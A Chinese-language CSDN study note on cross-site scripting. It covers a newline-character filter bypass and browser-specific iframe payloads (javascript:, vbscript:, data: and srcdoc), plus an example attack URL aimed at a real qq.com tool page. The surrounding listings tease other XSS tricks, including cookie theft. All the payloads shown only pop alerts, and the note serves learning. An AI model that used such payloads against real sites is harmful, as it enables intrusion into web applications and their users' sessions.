Day4Xss

最新推荐文章于 2024-01-25 16:36:30 发布
最新推荐文章于 2024-01-25 16:36:30 发布
阅读量135 收藏
点赞数
分类专栏: 学习随笔
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45808659/article/details/108904054
版权
注释中巧用换行符

这种情况出现在代码中输入的东西在源码中一模一样的显示,但是这种情况出现的并不多
在这里插入图片描述
使用换行符绕过
payload为

FilterValueAnd=%0aalert(1)

反射型xss告一段落,总结:巧用换行符、宽字节、反斜杠

DOM型XSS

不同浏览器利用iframe

XSS可以利用不同浏览器的特性来进行弹窗
src 执行 javascript 代码

<iframe src="javascript:alert(1)"></iframe>

IE 下 vbscript 执行代码

<iframe src="vbscript:msgbox(1)"></iframe>

Chrome 下 data 协议执行代码

<iframe src="data:text/html,<script>alert(1)</script>"></iframe>

上面的变体

<iframe src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>

Chrome 下 srcdoc 属性

<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>

例如:
chrome 下,我们可以用 data 协议来执行 JS。

http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=data:text/html,<script>alert(1)</script>'&gid=yl&cid=68&from=

明天要把这本书看完,冲鸭

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DomXSS以及绕过浏览器检测机制方法总结
安全汪
06-27 8930
今天继续研究了一下PKAV“心伤的瘦子”的XSS系列教程,收获挺大的,这里主要记录下来,以备忘记! 下面是这个系列教程的截图,可以在这里看到,当让,每一个知识知识点,都可以在这里(传送门)得到复现。作为程序员,会让你意思到自己以前的编码方式中有诸多的不足,作为安全研究者,深深地感觉到,原来还可以这么玩….昨天的知识点忘记整理了,先吧今天的写上,以后再补: **DOM_XSS之iframe标签的变
Day2Xss
Panacea
09-30 113
今天把悬剑挪出来了,物理机直接能打开,太香了 毫无过滤的情况下 也就是输入什么输出什么,可以在源码中直接看出来 直接输入<script>alert(1)</script> http://www.xxx.com?xxx=<script>alert(1)</script> 输出在&lt;script&gt;/lt;/script&gt;之间的情况 使用</script>闭合掉 过滤script字符 双写或者大小写绕过 过滤掉双
DAY18:XSS 漏洞
qq_49433473的博客
07-30 344
XSS漏洞概述,JavaScript基础,前置技能,XSS所需的JavaScript事件,反射性XSS、存储型XSS、DOM型XSS概述,XSS的Bypass技巧
DAY18:Xss 靶场通关手册
qq_49433473的博客
07-30 1279
xss-labs 靶场通关手册,超详细
Day5Xss
Panacea
10-03 127
谷歌浏览器下的绕过 无任何过滤 谷歌一般是直接过滤危险字符,比如: http://bangbang.qq.com/php/login?game=roco&uin="><img src=1 onerror=alert(1)>&world=5&roleid=44583443&level=8&role=%2 弹窗代码为: http://bangbang.qq.com/php/login?game=roco&uin="><script
XSS day01
qq_39536716的博客
04-26 128
简介 跨站脚本攻击,英文全称是 Cross Site Script ,本来缩写是CSS,但是为了和层叠样式表有所区别,所以在安全领域叫做“XSSXSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页的时候,控制用户浏览器的一种攻击。 分类 反射型XSS(非持久型XSS) 反射型XSS只是简单的把用户输入的数据,反射给浏览器,黑客往往需要诱使用户“点击”一个...
XSS漏洞——渗透day08
qq_62716256的博客
09-04 547
XSS漏洞——渗透day08
异次元发卡最新漏洞0day(XSS组合拳)
白昼小丑的博客
01-18 1648
异次元商店头像上传处存在存储型XSS注入(user、admin均存在)。其中,user处有过滤,admin无。 将恶意脚本插入后,管理员访问用户管理页面即可执行恶意脚本。 恶意脚本执行后,会新增一个管理员用户,进而获得权限。鉴于漏洞还没有泛滥,而且很多站都有漏洞。EXP暂时不公开。需要学习可以加入知识星球
DAY22xss2
hellodaoyan的博客
01-25 829
远程调用xss平台网站需要在意是http还是https协议cookie的利用1.抓包利用2.特定浏览器活软件这个浏览器的使用教程点进去之后再点击这个然后我们开始 利用cookiecookie有几个值我们就添加几个3.浏览器插件遇到的突发情况 例如空白 404这个时候我们要有种思维变换页面 可能是我们的管理界面被换了 只删了留言我们可以改id 或者把参数改了如果页面也没了 我们尝试访问admin等其他目录、当然这些都以cookie有效为前提总的来说就是扫二级目录。
渗透测试xss测试语句
07-14
console.log输出语句,不能绕WAF
web-day4.rar
03-30
【标题】"Web-Day4"通常指的是一个关于Web技术的培训课程或研讨会的第四天内容,可能涵盖了Web开发中的高级主题或特定技术的深入探讨。由于没有具体的标签信息,我们无法得知具体涉及哪些技术,但根据一般的Web开发...
console.log xss的各种变体
07-15
console.log xss的各种变体
java版商城源码下载-shadow2:渗透超全面的渗透资料:hundred_points:包含:0day,xss,sql注入,提权……
06-05
├─0day & exp │ ├─08CMS │ ├─AKCMS │ ├─bbsxp │ │ ├─BBSxp7.0 │ │ ├─bbsxp综合利用工具 │ │ └─BBSXP论坛漏洞完全注册工具 │ ├─BLUECMS │ ├─CreateLiveCMS │ ├─discuz │ │ ├─...
Day02
03-10
4. 数据库基础:对于数据库初学者,"Day02"可能会涉及SQL语言,包括SELECT查询、INSERT、UPDATE、DELETE操作,以及JOIN、子查询等高级特性。此外,可能还会讨论关系型数据库与非关系型数据库的区别。 5. 版本控制...
微信小程序设计淘宝客导购小程序 pangolin_tbk 2.0.8安装更新一体包源代码+部署教程完美运行版.7z
最新发布
08-11
经导师精心指导并认可、获 98 分的毕业设计项目!【项目资源】:微信小程序。【项目说明】:聚焦计算机相关专业毕设及实战操练,可作课程设计与期末大作业,含全部源码,能直用于毕设,经严格调试,运行有保障!【项目服务】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。 经导师精心指导并认可、获 98 分的毕业设计项目!【项目资源】:微信小程序。【项目说明】:聚焦计算机相关专业毕设及实战操练,可作课程设计与期末大作业,含全部源码,能直用于毕设,经严格调试,运行有保障!【项目服务】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。 经导师精心指导并认可、获 98 分的毕业设计项目!【项目资源】:微信小程序。【项目说明】:聚焦计算机相关专业毕设及实战操练,可作课程设计与期末大作业,含全部源码,能直用于毕设,经严格调试,运行有保障!【项目服务】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。 经导师精心指导并认可、获 98 分的毕业设计项目!【项目资源】:微信小程序。【项目说明】:聚焦计算机相关专业毕设及实战操练,可作课程设计与期末大作业,含全部源码,能直用于毕设,经严格调试,运行有保障!【项目服务】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。
光伏风电出力预测(Prediction of PV power and wind power oiutputs)+源代码+说明
08-11
<项目介绍> - python、Sk-learn、概率预测、光伏出力、风电出力 - 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
智慧景区综合解决方案.docx
08-11
智慧景区综合解决方案.docx
mediapipe-0.8.8.1-cp37-cp37m-win_amd64.whl
08-11
mediapipe-0.8.8.1-cp37-cp37m-win_amd64.whl
理解DOM型XSS攻击与防护策略
田靖宇-day211是一篇关于信息安全实训的文章,重点讲解了DOM-XSS攻击的相关知识。DOM-XSS,全称文档对象模型跨站脚本攻击,是Web安全领域中的一种常见漏洞类型。它利用浏览器的Document Object Model (DOM)文档对象...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值